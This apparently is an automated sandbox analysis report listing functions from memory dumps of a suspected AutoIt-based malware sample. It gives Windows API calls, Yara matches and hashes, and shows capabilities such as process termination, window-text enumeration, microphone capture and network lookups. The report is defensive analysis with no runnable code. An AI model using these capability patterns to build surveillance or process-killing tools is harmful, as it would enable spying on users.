Function 0179F435 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON

Download Yara Rule

APIs

GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0179F52F
GetThreadLocale.KERNEL32 ref: 0179F45F

Part of subcall function 0179F3BD: GetCPInfo.KERNEL32(00000000,?), ref: 0179F3D6

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: 24f4f9d218289e8a9991f6ab54308615a22ea7c1d07db9b53700fa80ec6175a8
Instruction ID: 75170ea96b77657171411f9ec3677e106fd3818ff164f0ef9e3fcdb48a34f733
Opcode Fuzzy Hash: 24f4f9d218289e8a9991f6ab54308615a22ea7c1d07db9b53700fa80ec6175a8
Instruction Fuzzy Hash: F23159615043568BEF21DFA8B8047A6BFD8BB96324FD48051D944DB39ADE74894CC3B1

Function 046FCD74 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON

Download Yara Rule

APIs

GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 046FCE6E
GetThreadLocale.KERNEL32 ref: 046FCD9E

Part of subcall function 046FCCFC: GetCPInfo.KERNEL32(00000000,?), ref: 046FCD15

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: 9e1030149be1e678e6313b95c0b3268e664e8d18f86e03a59b83481dc087392f
Instruction ID: bdc52461a0daccf3ae1b575651123cc66f7402fb2c5ed164f0f938e06bfd89c6
Opcode Fuzzy Hash: 9e1030149be1e678e6313b95c0b3268e664e8d18f86e03a59b83481dc087392f
Instruction Fuzzy Hash: B131B522D413598AE320DB64EC017E63B9CFB51314F448499D7C48F392FBA86949DBA5

Function 00C763F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C7642B
__isleadbyte_l.LIBCMT ref: 00C76459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C76487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C764BD

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9bee3f9a84f9afc35c821d6c9aec15c5e0c8a6b585fa594a6a2c1429a9a0c73b
Instruction ID: 6cb2b4ecce15c7da38e1cac4a7aed85f1fd9e4b372e43d2576ef627fcd6edf72
Opcode Fuzzy Hash: 9bee3f9a84f9afc35c821d6c9aec15c5e0c8a6b585fa594a6a2c1429a9a0c73b
Instruction Fuzzy Hash: 6031D331600A56AFDB25CF75CC45BAE7FA9FF40320F158129F86887191DB31EA50EB50

Function 047248B8 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 046FDFE4: CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,?,?,047247C0,00000000,0472489E,?,?,?,?,?,0470ACDD,00000000,0470B1B3), ref: 046FDFF5

Part of subcall function 046FE004: Process32First.KERNEL32(?,00000128), ref: 046FE015

GetCurrentProcessId.KERNEL32 ref: 04724982
OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0472499C
TerminateProcess.KERNEL32(00000000,00000001,00000000,?,00000000), ref: 047249A2
CloseHandle.KERNEL32(00000000), ref: 047249C5

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Process$CloseCreateCurrentFirstHandleOpenProcess32SnapshotTerminateToolhelp32
String ID:
API String ID: 4153222164-0
Opcode ID: 9f62f32b05d6fe2073cb393db924dfa5abdd50cfaa492d902e3c534601a4de3d
Instruction ID: e9b33653855e1ca0bde99beef931a4f4a982d37d652567b417c3c246b3a4a793
Opcode Fuzzy Hash: 9f62f32b05d6fe2073cb393db924dfa5abdd50cfaa492d902e3c534601a4de3d
Instruction Fuzzy Hash: F5316F31A012289BEB21EB64CC41BCDB7B5AF45304F1141E9E688A7350EB70BF45CF59

Function 0472AEC8 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 04727BEC: RtlEnterCriticalSection.NTDLL(04752F1C), ref: 04727BF4
Part of subcall function 04727BEC: RtlLeaveCriticalSection.NTDLL(04752F1C), ref: 04727C01
Part of subcall function 04727BEC: RtlEnterCriticalSection.NTDLL(?), ref: 04727C0A

Part of subcall function 0472C364: GetDC.USER32(00000000), ref: 0472C3BA
Part of subcall function 0472C364: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0472C3CF
Part of subcall function 0472C364: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0472C3D9
Part of subcall function 0472C364: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0472AF1B,00000000,0472AFA7), ref: 0472C3FD
Part of subcall function 0472C364: ReleaseDC.USER32(00000000,00000000), ref: 0472C408

CreateCompatibleDC.GDI32(00000000), ref: 0472AF1D
SelectObject.GDI32(00000000,?), ref: 0472AF36
SelectPalette.GDI32(00000000,?,000000FF), ref: 0472AF5F
RealizePalette.GDI32(00000000), ref: 0472AF6B

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: 15afe368cefe4ca0df92b35e7adf153c6e0228a3fc75efcbae4aa059939acf06
Instruction ID: 45846133676a3c3b1ae147e4f7bd8b2e14a4e3663ffb2b03bd4c59f8d92d33f8
Opcode Fuzzy Hash: 15afe368cefe4ca0df92b35e7adf153c6e0228a3fc75efcbae4aa059939acf06
Instruction Fuzzy Hash: 4931F7B4A04624EFD704EB69CA81D5EB3F5FF48724B6241A5E404AB321E734FE41DB50

Function 00CCCB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C429E2: GetWindowLongW.USER32(?,000000EB), ref: 00C429F3

GetCursorPos.USER32(?), ref: 00CCCB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C7BCEC,?,?,?,?,?), ref: 00CCCB8F
GetCursorPos.USER32(?), ref: 00CCCBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C7BCEC,?,?,?), ref: 00CCCC16

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 9cde40f92248b9860d5edee9c6143ead963cce0f54995b7a21873b85319fd544
Instruction ID: f805f9cbe783fa2b8a46ba47108ddd995bd589f345097fe8337dcbaf439538c2
Opcode Fuzzy Hash: 9cde40f92248b9860d5edee9c6143ead963cce0f54995b7a21873b85319fd544
Instruction Fuzzy Hash: 8B31C134600158AFCB158F99C899FBE7BB5FB49310F144099F9099B261C7316E51EFA0

Function 04741E94 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 04741ECD
GetWindowTextA.USER32(?,?,00000105), ref: 04741EDF
GetWindowTextA.USER32(?,?,00000105), ref: 04741F02
EnumChildWindows.USER32(?,04741E94,?), ref: 04741F78

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Window$Text$ChildEnumRectWindows
String ID:
API String ID: 3593914579-0
Opcode ID: 53b34b7a6c6b96e234e6df7fd12ec8f7b930972a2df8ab903d54781540145018
Instruction ID: 1d96591f955c3586e3f42859a0a3871e0873c154c738e66ca83218913b40d835
Opcode Fuzzy Hash: 53b34b7a6c6b96e234e6df7fd12ec8f7b930972a2df8ab903d54781540145018
Instruction Fuzzy Hash: D3215E7160061CAFEB10EF25CC84EEAB3F9EF89704F4145A5A948D7240EB30BE868F54

Function 00C60BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00C60BE2

Part of subcall function 00C5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CA7E51,?,?,00000000), ref: 00C54041
Part of subcall function 00C5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CA7E51,?,?,00000000,?,?), ref: 00C54065

_fprintf.LIBCMT ref: 00C60C19
OutputDebugStringW.KERNEL32(?), ref: 00C9694C

Part of subcall function 00C64CCA: _flsall.LIBCMT ref: 00C64CE3

__setmode.LIBCMT ref: 00C60C4E

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 266e5aa0c8c0a2db3f89acf7761449a28ec620e7bfe93c77b1912c859d63241b
Instruction ID: 8477645d8692428bf8c420201f926e0958859a58c1c2111cf99423ba81a8309d
Opcode Fuzzy Hash: 266e5aa0c8c0a2db3f89acf7761449a28ec620e7bfe93c77b1912c859d63241b
Instruction Fuzzy Hash: 711127319051047ACB2CB7B4DC86ABE7B6DDF41321F24011AF204662C2DF225D86A7A5

Function 0474C618 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 69sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,00000000,0474C710,?,?,?,00000000,00000000,00000000,00000000), ref: 0474C64A
Sleep.KERNEL32(001B7740,000003E8,00000000,0474C710,?,?,?,00000000,00000000,00000000,00000000), ref: 0474C654

Part of subcall function 0471794C: Sleep.KERNEL32(00000064,00000000,04717A31,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 047179FE

Part of subcall function 0470C608: closesocket.WS2_32(?), ref: 0470C60F

Strings

NOTIFICATIONS, xrefs: 0474C6D0
DOMAINS, xrefs: 0474C692, 0474C6B2

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Sleep$closesocket
String ID: DOMAINS$NOTIFICATIONS
API String ID: 1480910923-4053764644
Opcode ID: 415a68acad9bd6727dae62c31ff76d2a42db36673eff5254ce5b5d4ce558f4cb
Instruction ID: 712f289588fc9ce17f286e7cdfc882f5b535511e93e4b68faaa2d82f0060c4a8
Opcode Fuzzy Hash: 415a68acad9bd6727dae62c31ff76d2a42db36673eff5254ce5b5d4ce558f4cb
Instruction Fuzzy Hash: 23215C74711204DFE705FB68CC898AE73E9EF892087519568E841AB360EF70FD05CB56

Function 00CC634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00CC63BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC63D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC63E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CC63F3

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 0117365095fca9f4794678907da60a844fcf8cb6b35293c5cd5da607e5988235
Instruction ID: 40771cff489caef13003f52ed92f56e0f300c3f578f7c49cc6eff3c2efb14ab5
Opcode Fuzzy Hash: 0117365095fca9f4794678907da60a844fcf8cb6b35293c5cd5da607e5988235
Instruction Fuzzy Hash: F7118135305514AFD704AB28DC45FBE7799EF85320F18421DF916C72E2DB60AD018B95

Function 00C9E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C9E46F,?,?,?,00C9F262,00000000,000000EF,00000119,?,?), ref: 00C9F867
Part of subcall function 00C9F858: lstrcpyW.KERNEL32(00000000,?,?,00C9E46F,?,?,?,00C9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C9F88D
Part of subcall function 00C9F858: lstrcmpiW.KERNEL32(00000000,?,00C9E46F,?,?,?,00C9F262,00000000,000000EF,00000119,?,?), ref: 00C9F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C9E488
lstrcpyW.KERNEL32(00000000,?,?,00C9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C9E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C9F262,00000000,000000EF,00000119,?,?,00000000), ref: 00C9E4E2

Strings

cdecl, xrefs: 00C9E4D9

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: f8d3a70a827e788b1af409634d535163b2784ccb180ae1ef7afafcb070508904
Instruction ID: de4364b46fa3c696724cdf4b96cb370189a32674b260630f8b745de1c2a3b756
Opcode Fuzzy Hash: f8d3a70a827e788b1af409634d535163b2784ccb180ae1ef7afafcb070508904
Instruction Fuzzy Hash: 3D11BE3A200345AFCF25AF64D849E7E77A8FF45350B50402AF80ACB2A0EB31D951D791

Function 04749AFC Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

waveInOpen.WINMM(04753274,00000000,04750D00,Function_00058AE0,00000000,00030000), ref: 04749B60
waveInPrepareHeader.WINMM(00000000,00000000,00000020,04753274,00000000,04750D00,Function_00058AE0,00000000,00030000), ref: 04749B9C
waveInAddBuffer.WINMM(00000000,00000000,00000020,00000000,00000000,00000020,04753274,00000000,04750D00,Function_00058AE0,00000000,00030000), ref: 04749BB3
waveInStart.WINMM(00000000,00000000,00000000,00000020,00000000,00000000,00000020,04753274,00000000,04750D00,Function_00058AE0,00000000,00030000), ref: 04749BC2

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderOpenPrepareStart
String ID:
API String ID: 4183526013-0
Opcode ID: 59df1b9d38bdb26ddb61465ce385593d47b67f01ea48fb3092e787ad316bb41c
Instruction ID: dcdde14124834e60b41377e07e4fe1549ff2312429b82181eddc4b89bc081a18
Opcode Fuzzy Hash: 59df1b9d38bdb26ddb61465ce385593d47b67f01ea48fb3092e787ad316bb41c
Instruction Fuzzy Hash: 8F211AF1604700ABEB00DF79EA54AA677E8FB84385F01C529EE44CB360E7B9AC40DB51

Function 00CA4365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CA4385
_memset.LIBCMT ref: 00CA43A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CA43F8
CloseHandle.KERNEL32(00000000), ref: 00CA4401

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 716cea7d8f76beb88a881bd4dd39defbf3ed4ebca43958df11440d998388e61d
Instruction ID: 7c467ae81dc2c179823fe53d3dc692c21a97f8d47b2870cadccf95d2591e2ce6
Opcode Fuzzy Hash: 716cea7d8f76beb88a881bd4dd39defbf3ed4ebca43958df11440d998388e61d
Instruction Fuzzy Hash: D2110D719022287AD7309BA5AC4DFEFBB7CEF45724F10459AF908E7190D2704F808BA4

Function 0470D718 Relevance: 6.1, APIs: 4, Instructions: 62networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 0470D768
htons.WS2_32(?), ref: 0470D78C
htons.WS2_32(?), ref: 0470D7AA
FreeAddrInfoW.WS2_32(00000000), ref: 0470D7CB

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: htons$AddrFreeInfogetaddrinfo
String ID:
API String ID: 3288377348-0
Opcode ID: 1d6b3b9bccba3e82e30fd65e40b3be288a5d0cf0b37b82b26f3a47508c10b9ed
Instruction ID: 7d9699f0180bb7c31a043c0a3f33e57cf8f900f5c9077f89957dffc29ae7ccc4
Opcode Fuzzy Hash: 1d6b3b9bccba3e82e30fd65e40b3be288a5d0cf0b37b82b26f3a47508c10b9ed
Instruction Fuzzy Hash: DA214978A01309EFDB10DFE4D648AAEBBF9EB48310F218066E804E7351D330AE40CB25

Function 00CB6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CA7E51,?,?,00000000), ref: 00C54041
Part of subcall function 00C5402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CA7E51,?,?,00000000,?,?), ref: 00C54065

gethostbyname.WSOCK32(?,?,?), ref: 00CB6A84
WSAGetLastError.WSOCK32(00000000), ref: 00CB6A8F
_memmove.LIBCMT ref: 00CB6ABC
inet_ntoa.WSOCK32(?), ref: 00CB6AC7

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 37cdba0c99416c6a0888414e08d25eb665f88d223a693e0826caef1508a85986
Instruction ID: a772ec6eb91535d21adc09d271430bbff94eb875095e078e0ac4fdfd5c627edd
Opcode Fuzzy Hash: 37cdba0c99416c6a0888414e08d25eb665f88d223a693e0826caef1508a85986
Instruction Fuzzy Hash: F0115175500108AFCB04FBA4CD46EEEB7B9EF14311B244065F906A72A2DF31AE54EBA1

Function 01798F57 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(017A2B4D), ref: 01798F70
RtlEnterCriticalSection.NTDLL(017A2B4D), ref: 01798F83
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,01799021), ref: 01798FAD
RtlLeaveCriticalSection.NTDLL(017A2B4D), ref: 0179901B

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 2c6958c57999b82d3848222a9eeaee03a3eeb3942ffe2015c0726e61d2658b8f
Instruction ID: f2fd4f9f2b313b53af48442172be787c087f43100c26347bf65d85aa2991b2f4
Opcode Fuzzy Hash: 2c6958c57999b82d3848222a9eeaee03a3eeb3942ffe2015c0726e61d2658b8f
Instruction Fuzzy Hash: 7611E7B4A0420AAFEF25DFADE425B5DFBE1E78A310F908469E10097656E6709D14CB22

Function 046F1B66 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(047525CC), ref: 046F1B7F
RtlEnterCriticalSection.NTDLL(047525CC), ref: 046F1B92
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,046F1C30), ref: 046F1BBC
RtlLeaveCriticalSection.NTDLL(047525CC), ref: 046F1C2A

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 187d0e9ffcab7d1a1cbe4e8f69180fa064be69bf3875e05388e8cbb994c7d9b7
Instruction ID: 5fbf075239936b4ee5909db288f6fb106063aa570dcd2c20f1529be94df39c16
Opcode Fuzzy Hash: 187d0e9ffcab7d1a1cbe4e8f69180fa064be69bf3875e05388e8cbb994c7d9b7
Instruction Fuzzy Hash: 6B1196B1604340EFF705EB54C9147D877D5E75A344F1080E8E580AB761E5B97D41CF65

Function 01798F59 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(017A2B4D), ref: 01798F70
RtlEnterCriticalSection.NTDLL(017A2B4D), ref: 01798F83
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,01799021), ref: 01798FAD
RtlLeaveCriticalSection.NTDLL(017A2B4D), ref: 0179901B

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 115dab36590a4ef4c3e33142a62f96ac8257589c5f13efd043a89fd5bfb68d2e
Instruction ID: 7be971b755b009971cb82211da35dae32524def831b0082ce2d0c6cf19b6a819
Opcode Fuzzy Hash: 115dab36590a4ef4c3e33142a62f96ac8257589c5f13efd043a89fd5bfb68d2e
Instruction Fuzzy Hash: 78110AB4A0420ADFEF25DF9DF425B5DFBE1E7CA310F908469E10097656E6709914CB22

Function 046F1B68 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(047525CC), ref: 046F1B7F
RtlEnterCriticalSection.NTDLL(047525CC), ref: 046F1B92
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,046F1C30), ref: 046F1BBC
RtlLeaveCriticalSection.NTDLL(047525CC), ref: 046F1C2A

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 1fb069751255bfb83a352cdcd1ad736ee2b61ba9e1148e758b61d94df8d23660
Instruction ID: 2e4643f083696f038d4eff965f8497ac3cedeeeccb0e26eeb96bc818eecb3baf
Opcode Fuzzy Hash: 1fb069751255bfb83a352cdcd1ad736ee2b61ba9e1148e758b61d94df8d23660
Instruction Fuzzy Hash: 6E11B6B1604340EFF709EB94C914BD877E5E75A384F1080E8E580ABBA1E6B97D41CF65

Function 00C42111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C4214F
GetStockObject.GDI32(00000011), ref: 00C42163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C4216D

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
